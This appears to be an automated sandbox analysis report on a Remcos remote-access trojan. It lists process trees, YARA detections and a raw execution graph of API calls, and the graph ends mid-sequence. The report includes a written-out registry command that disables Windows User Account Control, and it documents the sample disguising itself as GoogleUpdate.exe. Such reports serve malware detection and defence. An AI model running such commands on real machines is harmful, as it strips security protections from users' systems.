                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000000.1689947215.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000000.1689947215.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, Author: ditekSHen
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, Author: unknown
                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, Author: unknown
                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, Author: ditekSHen
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 89%, ReversingLabs
                              Reputation:low
                              Has exited:false

                              Target ID:11
                              Start time:14:06:58
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:12
                              Start time:14:06:58
                              Start date:11/01/2025
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:13
                              Start time:14:06:58
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\svchost.exe
                              Wow64 process (32bit):true
                              Commandline:svchost.exe
                              Imagebase:0x1d0000
                              File size:46'504 bytes
                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.4123857872.0000000003230000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.4123857872.0000000003230000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                              Reputation:high
                              Has exited:false

                              Target ID:14
                              Start time:14:06:58
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\reg.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                              Imagebase:0xa20000
                              File size:59'392 bytes
                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:15
                              Start time:14:07:05
                              Start date:11/01/2025
                              Path:C:\ProgramData\GoogleDat\GoogleUpdate.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\ProgramData\GoogleDat\GoogleUpdate.exe"
                              Imagebase:0x400000
                              File size:480'256 bytes
                              MD5 hash:991E707E324731F86A43900E34070808
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.1756643993.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.1756643993.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000000.1756098739.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000000.1756098739.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
                              Has exited:true

                              Target ID:18
                              Start time:14:07:05
                              Start date:11/01/2025
                              Path:C:\ProgramData\GoogleDat\GoogleUpdate.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\ProgramData\GoogleDat\GoogleUpdate.exe"
                              Imagebase:0x400000
                              File size:480'256 bytes
                              MD5 hash:991E707E324731F86A43900E34070808
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000000.1762040408.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000012.00000000.1762040408.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.1762879487.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000012.00000002.1762879487.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
                              Has exited:true

                              Target ID:20
                              Start time:14:07:13
                              Start date:11/01/2025
                              Path:C:\ProgramData\GoogleDat\GoogleUpdate.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\ProgramData\GoogleDat\GoogleUpdate.exe"
                              Imagebase:0x400000
                              File size:480'256 bytes
                              MD5 hash:991E707E324731F86A43900E34070808
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000000.1836764394.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000000.1836764394.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.1837263021.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.1837263021.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
                              Has exited:true

                              Target ID:22
                              Start time:14:07:13
                              Start date:11/01/2025
                              Path:C:\ProgramData\GoogleDat\GoogleUpdate.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\ProgramData\GoogleDat\GoogleUpdate.exe"
                              Imagebase:0x400000
                              File size:480'256 bytes
                              MD5 hash:991E707E324731F86A43900E34070808
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.1840917255.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000016.00000002.1840917255.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000000.1840006735.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000016.00000000.1840006735.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
                              Has exited:true

                              Target ID:25
                              Start time:14:07:21
                              Start date:11/01/2025
                              Path:C:\ProgramData\GoogleDat\GoogleUpdate.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\ProgramData\GoogleDat\GoogleUpdate.exe"
                              Imagebase:0x400000
                              File size:480'256 bytes
                              MD5 hash:991E707E324731F86A43900E34070808
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.1917821912.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000019.00000002.1917821912.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000000.1917703042.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000019.00000000.1917703042.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
                              Has exited:true

                              Target ID:27
                              Start time:14:07:21
                              Start date:11/01/2025
                              Path:C:\ProgramData\GoogleDat\GoogleUpdate.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\ProgramData\GoogleDat\GoogleUpdate.exe"
                              Imagebase:0x400000
                              File size:480'256 bytes
                              MD5 hash:991E707E324731F86A43900E34070808
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000000.1919217572.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001B.00000000.1919217572.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000002.1919786507.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001B.00000002.1919786507.0000000000456000.00000002.00000001.01000000.00000008.sdmp, Author: unknown
                              Has exited:true

                              Reset < >

                                Execution Graph

                                Execution Coverage:2.1%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:25.3%
                                Total number of Nodes:766
                                Total number of Limit Nodes:18
                                execution_graph 44631 40163e 44632 401646 44631->44632 44633 401649 44631->44633 44634 401688 44633->44634 44636 401676 44633->44636 44639 43229f 44634->44639 44638 43229f new 22 API calls 44636->44638 44637 40167c 44638->44637 44641 4322a4 44639->44641 44642 4322d0 44641->44642 44646 439adb 44641->44646 44653 440480 7 API calls 2 library calls 44641->44653 44654 4329bd RaiseException Concurrency::cancel_current_task __CxxThrowException@8 44641->44654 44655 43301b RaiseException Concurrency::cancel_current_task __CxxThrowException@8 44641->44655 44642->44637 44652 443649 ___crtLCMapStringA 44646->44652 44647 443687 44657 43ad91 20 API calls __dosmaperr 44647->44657 44649 443672 RtlAllocateHeap 44650 443685 44649->44650 44649->44652 44650->44641 44652->44647 44652->44649 44656 440480 7 API calls 2 library calls 44652->44656 44653->44641 44656->44652 44657->44650 44658 43263c 44659 432648 ___scrt_is_nonwritable_in_current_image 44658->44659 44685 43234b 44659->44685 44661 43264f 44663 432678 44661->44663 44945 4327ae IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 44661->44945 44668 4326b7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 44663->44668 44946 441763 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 44663->44946 44665 432691 44667 432697 ___scrt_is_nonwritable_in_current_image 44665->44667 44947 441707 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 44665->44947 44674 432717 44668->44674 44948 4408e7 35 API calls 5 library calls 44668->44948 44696 4328c9 44674->44696 44686 432354 44685->44686 44953 4329da IsProcessorFeaturePresent 44686->44953 44688 432360 44954 436cd1 10 API calls 4 library calls 44688->44954 44690 432365 44695 432369 44690->44695 44955 4415bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 44690->44955 44692 432372 44693 432380 44692->44693 44956 436cfa 8 API calls 3 library calls 44692->44956 44693->44661 44695->44661 44957 434c30 44696->44957 44699 43271d 44700 4416b4 44699->44700 44959 44c239 44700->44959 44702 432726 44705 40d3f0 44702->44705 44703 4416bd 44703->44702 44963 443d25 35 API calls 44703->44963 44965 41a8da LoadLibraryA GetProcAddress 44705->44965 44707 40d40c 44972 40dd83 44707->44972 44709 40d415 44987 4020d6 44709->44987 44712 4020d6 28 API calls 44713 40d433 44712->44713 44993 419d87 44713->44993 44717 40d445 45019 401e6d 44717->45019 44719 40d44e 44720 40d461 44719->44720 44721 40d4b8 44719->44721 45271 40e609 95 API calls 44720->45271 45025 401e45 44721->45025 44724 40d4c6 44728 401e45 22 API calls 44724->44728 44725 40d473 44726 401e45 22 API calls 44725->44726 44727 40d47f 44726->44727 45272 40f98d 36 API calls __EH_prolog 44727->45272 44729 40d4e5 44728->44729 45030 4052fe 44729->45030 44732 40d491 45273 40e5ba 77 API calls 44732->45273 44733 40d4f4 45035 408209 44733->45035 44737 40d49a 45274 40dd70 70 API calls 44737->45274 44746 401fb8 11 API calls 44747 40d520 44746->44747 44748 401e45 22 API calls 44747->44748 44749 40d529 44748->44749 45052 401fa0 44749->45052 44751 40d534 44752 401e45 22 API calls 44751->44752 44753 40d54f 44752->44753 44754 401e45 22 API calls 44753->44754 44755 40d569 44754->44755 44756 40d5cf 44755->44756 45056 40822a 44755->45056 44757 401e45 22 API calls 44756->44757 44763 40d5dc 44757->44763 44759 40d594 44760 401fc2 28 API calls 44759->44760 44761 40d5a0 44760->44761 44764 401fb8 11 API calls 44761->44764 44762 40d650 44768 40d660 CreateMutexA GetLastError 44762->44768 44763->44762 44765 401e45 22 API calls 44763->44765 44766 40d5a9 44764->44766 44767 40d5f5 44765->44767 45061 411f34 RegOpenKeyExA 44766->45061 44771 40d5fc OpenMutexA 44767->44771 44769 40d987 44768->44769 44770 40d67f GetModuleFileNameW 44768->44770 44773 401fb8 11 API calls 44769->44773 44813 40d9ec 44769->44813 45064 4192ae 44770->45064 44776 40d622 44771->44776 44777 40d60f WaitForSingleObject CloseHandle 44771->44777 44797 40d99a ___scrt_get_show_window_mode 44773->44797 44782 411f34 3 API calls 44776->44782 44777->44776 44779 40dd0f 45306 41239a 30 API calls 44779->45306 44780 40d6a0 44781 40d6f5 44780->44781 44783 401e45 22 API calls 44780->44783 44785 401e45 22 API calls 44781->44785 44788 40d63b 44782->44788 44791 40d6bf 44783->44791 44793 40d720 44785->44793 44786 40dd22 45307 410eda 65 API calls ___scrt_get_show_window_mode 44786->45307 44788->44762 45275 41239a 30 API calls 44788->45275 44789 40dcfa 44795 402073 28 API calls 44789->44795 44820 40dd6a 44789->44820 44791->44781 44798 40d6f7 44791->44798 44806 40d6db 44791->44806 44792 40d731 44794 401e45 22 API calls 44792->44794 44793->44792 45093 40e501 44793->45093 44804 40d73a 44794->44804 44799 40dd3a 44795->44799 45285 4120e8 RegOpenKeyExA 44797->45285 45276 411eea RegOpenKeyExA RegQueryValueExA RegCloseKey 44798->45276 45308 4052dd 28 API calls 44799->45308 44811 401e45 22 API calls 44804->44811 44806->44781 45081 4067a0 44806->45081 44808 40d70d 44808->44781 44812 40d712 44808->44812 44815 40d755 44811->44815 45277 4066a6 59 API calls 44812->45277 44817 401e45 22 API calls 44813->44817 44822 401e45 22 API calls 44815->44822 44818 40da10 44817->44818 45288 402073 44818->45288 45309 413980 130 API calls 44820->45309 44825 40d76f 44822->44825 44827 401e45 22 API calls 44825->44827 44826 40da22 45294 41215f 14 API calls 44826->45294 44829 40d789 44827->44829 44832 401e45 22 API calls 44829->44832 44830 40da38 44831 401e45 22 API calls 44830->44831 44833 40da44 44831->44833 44836 40d7a3 44832->44836 45295 439867 39 API calls _swprintf 44833->45295 44835 40d810 44835->44797 44842 401e45 22 API calls 44835->44842 44853 40d8a7 44835->44853 44836->44835 44838 401e45 22 API calls 44836->44838 44837 40da51 44839 40da7e 44837->44839 45296 41aa4f 82 API calls ___scrt_get_show_window_mode 44837->45296 44847 40d7b8 _wcslen 44838->44847 44841 402073 28 API calls 44839->44841 44845 40da8d 44841->44845 44843 40d831 44842->44843 44849 401e45 22 API calls 44843->44849 44844 40da70 CreateThread 44844->44839 45610 41b212 10 API calls 44844->45610 44846 402073 28 API calls 44845->44846 44848 40da9c 44846->44848 44847->44835 44854 401e45 22 API calls 44847->44854 45297 4194da 79 API calls 44848->45297 44851 40d843 44849->44851 44858 401e45 22 API calls 44851->44858 44852 40daa1 44855 401e45 22 API calls 44852->44855 44877 40d89f ___scrt_get_show_window_mode 44853->44877 44856 40d7d3 44854->44856 44857 40daad 44855->44857 44859 401e45 22 API calls 44856->44859 44861 401e45 22 API calls 44857->44861 44860 40d855 44858->44860 44862 40d7e8 44859->44862 44864 401e45 22 API calls 44860->44864 44863 40dabf 44861->44863 45096 40c5ed 44862->45096 44867 401e45 22 API calls 44863->44867 44866 40d87e 44864->44866 44872 401e45 22 API calls 44866->44872 44869 40dad5 44867->44869 44875 401e45 22 API calls 44869->44875 44871 40d807 45279 401ee9 44871->45279 44873 40d88f 44872->44873 45154 40b871 44873->45154 44876 40daf5 44875->44876 45298 439867 39 API calls _swprintf 44876->45298 44877->44853 45282 412338 31 API calls 44877->45282 44880 40d942 ctype 44883 401e45 22 API calls 44880->44883 44882 40db02 44884 401e45 22 API calls 44882->44884 44887 40d959 44883->44887 44885 40db0d 44884->44885 44886 401e45 22 API calls 44885->44886 44888 40db1e 44886->44888 44887->44813 44889 401e45 22 API calls 44887->44889 45299 408f1f 164 API calls _wcslen 44888->45299 44890 40d976 44889->44890 45283 419bca 28 API calls 44890->45283 44893 40d982 45284 40de34 91 API calls 44893->45284 44894 40db33 44896 401e45 22 API calls 44894->44896 44898 40db3c 44896->44898 44897 40db83 44899 401e45 22 API calls 44897->44899 44898->44897 44900 43229f new 22 API calls 44898->44900 44905 40db91 44899->44905 44901 40db53 44900->44901 44902 401e45 22 API calls 44901->44902 44903 40db65 44902->44903 44907 40db6c CreateThread 44903->44907 44904 40dbd9 44906 401e45 22 API calls 44904->44906 44905->44904 44908 43229f new 22 API calls 44905->44908 44913 40dbe2 44906->44913 44907->44897 45608 417f6a 107 API calls __EH_prolog 44907->45608 44909 40dba5 44908->44909 44910 401e45 22 API calls 44909->44910 44911 40dbb6 44910->44911 44916 40dbbd CreateThread 44911->44916 44912 40dc4c 44914 401e45 22 API calls 44912->44914 44913->44912 44915 401e45 22 API calls 44913->44915 44918 40dc55 44914->44918 44917 40dbfc 44915->44917 44916->44904 45606 417f6a 107 API calls __EH_prolog 44916->45606 44920 401e45 22 API calls 44917->44920 44919 40dc99 44918->44919 44922 401e45 22 API calls 44918->44922 45304 4195f8 76 API calls 44919->45304 44923 40dc11 44920->44923 44925 40dc69 44922->44925 45300 40c5a1 32 API calls 44923->45300 44924 40dca2 45305 401ef3 28 API calls 44924->45305 44930 401e45 22 API calls 44925->44930 44927 40dcad 44929 401ee9 11 API calls 44927->44929 44932 40dcb6 CreateThread 44929->44932 44933 40dc7e 44930->44933 44931 40dc24 45301 401ef3 28 API calls 44931->45301 44938 40dce5 44932->44938 44939 40dcd9 CreateThread 44932->44939 45607 40e18d 118 API calls 44932->45607 45302 439867 39 API calls _swprintf 44933->45302 44935 40dc30 44937 401ee9 11 API calls 44935->44937 44942 40dc39 CreateThread 44937->44942 44938->44789 44940 40dcee CreateThread 44938->44940 44939->44938 45609 410b5c 135 API calls 44939->45609 44940->44789 45611 411140 38 API calls ___scrt_get_show_window_mode 44940->45611 44942->44912 45612 401bc9 49 API calls 44942->45612 44943 40dc8b 45303 40b0a3 7 API calls 44943->45303 44945->44661 44946->44665 44947->44668 44948->44674 44953->44688 44954->44690 44955->44692 44956->44695 44958 4328dc GetStartupInfoW 44957->44958 44958->44699 44960 44c24b 44959->44960 44961 44c242 44959->44961 44960->44703 44964 44c138 48 API calls 5 library calls 44961->44964 44963->44703 44964->44960 44966 41a919 LoadLibraryA GetProcAddress 44965->44966 44967 41a909 GetModuleHandleA GetProcAddress 44965->44967 44968 41a947 GetModuleHandleA GetProcAddress 44966->44968 44969 41a937 GetModuleHandleA GetProcAddress 44966->44969 44967->44966 44970 41a973 24 API calls 44968->44970 44971 41a95f GetModuleHandleA GetProcAddress 44968->44971 44969->44968 44970->44707 44971->44970 45310 419493 FindResourceA 44972->45310 44975 439adb _Yarn 21 API calls 44976 40ddad _Yarn 44975->44976 45313 402097 44976->45313 44979 401fc2 28 API calls 44980 40ddd3 44979->44980 44981 401fb8 11 API calls 44980->44981 44982 40dddc 44981->44982 44983 439adb _Yarn 21 API calls 44982->44983 44984 40dded _Yarn 44983->44984 45319 4062ee 44984->45319 44986 40de20 44986->44709 44988 4020ec 44987->44988 44989 4023ae 11 API calls 44988->44989 44990 402106 44989->44990 44991 402549 28 API calls 44990->44991 44992 402114 44991->44992 44992->44712 45354 4020bf 44993->45354 44995 419e0a 44996 401fb8 11 API calls 44995->44996 44997 419e3c 44996->44997 44998 401fb8 11 API calls 44997->44998 45000 419e44 44998->45000 44999 419e0c 45370 404182 28 API calls 44999->45370 45003 401fb8 11 API calls 45000->45003 45005 40d43c 45003->45005 45004 419e18 45006 401fc2 28 API calls 45004->45006 45015 40e563 45005->45015 45008 419e21 45006->45008 45007 401fc2 28 API calls 45014 419d9a 45007->45014 45010 401fb8 11 API calls 45008->45010 45009 401fb8 11 API calls 45009->45014 45011 419e29 45010->45011 45012 41ab9a 28 API calls 45011->45012 45012->44995 45014->44995 45014->44999 45014->45007 45014->45009 45358 404182 28 API calls 45014->45358 45359 41ab9a 45014->45359 45016 40e56f 45015->45016 45018 40e576 45015->45018 45396 402143 11 API calls 45016->45396 45018->44717 45020 402143 45019->45020 45021 40217f 45020->45021 45397 402710 11 API calls 45020->45397 45021->44719 45023 402164 45398 4026f2 11 API calls std::_Deallocate 45023->45398 45026 401e4d 45025->45026 45027 401e55 45026->45027 45399 402138 22 API calls 45026->45399 45027->44724 45031 4020bf 11 API calls 45030->45031 45032 40530a 45031->45032 45400 403280 45032->45400 45034 405326 45034->44733 45405 4051cf 45035->45405 45037 408217 45409 402035 45037->45409 45040 401fc2 45041 401fd1 45040->45041 45048 402019 45040->45048 45042 4023ae 11 API calls 45041->45042 45043 401fda 45042->45043 45044 40201c 45043->45044 45045 401ff5 45043->45045 45046 40265a 11 API calls 45044->45046 45424 403078 28 API calls 45045->45424 45046->45048 45049 401fb8 45048->45049 45050 4023ae 11 API calls 45049->45050 45051 401fc1 45050->45051 45051->44746 45053 401fb2 45052->45053 45054 401fa9 45052->45054 45053->44751 45425 4025c0 28 API calls 45054->45425 45057 4020bf 11 API calls 45056->45057 45058 408236 45057->45058 45059 403280 28 API calls 45058->45059 45060 408253 45059->45060 45060->44759 45062 40d5c5 45061->45062 45063 411f5e RegQueryValueExA RegCloseKey 45061->45063 45062->44756 45062->44779 45063->45062 45426 419f23 45064->45426 45069 401fc2 28 API calls 45070 4192ea 45069->45070 45071 401fb8 11 API calls 45070->45071 45072 4192f2 45071->45072 45073 411f91 31 API calls 45072->45073 45075 419348 45072->45075 45074 41931b 45073->45074 45076 419326 StrToIntA 45074->45076 45075->44780 45077 41933d 45076->45077 45078 419334 45076->45078 45079 401fb8 11 API calls 45077->45079 45435 41accf 22 API calls 45078->45435 45079->45075 45082 4067c0 ___scrt_get_show_window_mode 45081->45082 45083 4120e8 3 API calls 45082->45083 45084 4067f9 45083->45084 45085 406800 45084->45085 45086 40683b 45084->45086 45087 402073 28 API calls 45085->45087 45086->44781 45088 406813 45087->45088 45436 41215f 14 API calls 45088->45436 45090 406822 45437 41239a 30 API calls 45090->45437 45092 406836 45092->45086 45094 40e519 ___scrt_get_show_window_mode 45093->45094 45095 40e528 CreateProcessA CloseHandle CloseHandle 45094->45095 45095->44792 45438 401f66 45096->45438 45099 40c629 45448 41959f 29 API calls 45099->45448 45100 40c65e 45104 419f23 2 API calls 45100->45104 45101 40c61f 45103 40c752 GetLongPathNameW 45101->45103 45442 40415e 45103->45442 45107 40c663 45104->45107 45105 40c632 45449 401ef3 28 API calls 45105->45449 45110 40c667 45107->45110 45111 40c6b9 45107->45111 45112 40415e 28 API calls 45110->45112 45115 40415e 28 API calls 45111->45115 45117 40c675 45112->45117 45113 40c63c 45119 401ee9 11 API calls 45113->45119 45114 40415e 28 API calls 45118 40c776 45114->45118 45116 40c6c7 45115->45116 45123 40415e 28 API calls 45116->45123 45124 40415e 28 API calls 45117->45124 45461 40c7f9 28 API calls 45118->45461 45119->45101 45121 40c789 45122 402f85 28 API calls 45121->45122 45125 40c794 45122->45125 45126 40c6dd 45123->45126 45127 40c68b 45124->45127 45128 402f85 28 API calls 45125->45128 45129 402f85 28 API calls 45126->45129 45450 402f85 45127->45450 45131 40c79e 45128->45131 45132 40c6e8 45129->45132 45134 401ee9 11 API calls 45131->45134 45460 401ef3 28 API calls 45132->45460 45137 40c7a8 45134->45137 45140 401ee9 11 API calls 45137->45140 45138 40c6f3 45141 401ee9 11 API calls 45138->45141 45139 40c6a1 45142 401ee9 11 API calls 45139->45142 45143 40c7b1 45140->45143 45144 40c6fc 45141->45144 45145 40c6aa 45142->45145 45146 401ee9 11 API calls 45143->45146 45147 401ee9 11 API calls 45144->45147 45148 401ee9 11 API calls 45145->45148 45149 40c7ba 45146->45149 45147->45113 45148->45113 45150 401ee9 11 API calls 45149->45150 45151 40c7c3 45150->45151 45152 401ee9 11 API calls 45151->45152 45153 40c7cc 45152->45153 45278 401ef3 28 API calls 45153->45278 45155 40b887 _wcslen 45154->45155 45156 40b891 45155->45156 45157 40b8e2 45155->45157 45160 40b89a CreateDirectoryW 45156->45160 45158 40c5ed 32 API calls 45157->45158 45159 40b8f7 45158->45159 45563 401ef3 28 API calls 45159->45563 45505 4081c7 45160->45505 45163 40b8dc 45166 401ee9 11 API calls 45163->45166 45164 40b8b9 45165 402ff4 28 API calls 45164->45165 45167 40b8c5 45165->45167 45171 40b90e 45166->45171 45562 401ef3 28 API calls 45167->45562 45169 40b8d3 45170 401ee9 11 API calls 45169->45170 45170->45163 45172 40b941 45171->45172 45173 40b927 45171->45173 45174 40b94a CopyFileW 45172->45174 45175 40b77f 31 API calls 45173->45175 45176 40b9f5 45174->45176 45179 40b95c _wcslen 45174->45179 45177 40b938 45175->45177 45512 40b77f 45176->45512 45177->44877 45179->45176 45181 40b9b9 45179->45181 45182 40b979 45179->45182 45185 40c5ed 32 API calls 45181->45185 45186 40c5ed 32 API calls 45182->45186 45183 40ba12 45189 40ba1b SetFileAttributesW 45183->45189 45184 40ba3e 45192 40415e 28 API calls 45184->45192 45187 40b9be 45185->45187 45188 40b984 45186->45188 45565 401ef3 28 API calls 45187->45565 45191 402ff4 28 API calls 45188->45191 45203 40ba2a _wcslen 45189->45203 45194 40b990 45191->45194 45196 40ba58 45192->45196 45193 40b9b7 45197 401ee9 11 API calls 45193->45197 45195 402ff4 28 API calls 45194->45195 45198 40b99c 45195->45198 45538 402ff4 45196->45538 45200 40b9d0 45197->45200 45564 401ef3 28 API calls 45198->45564 45205 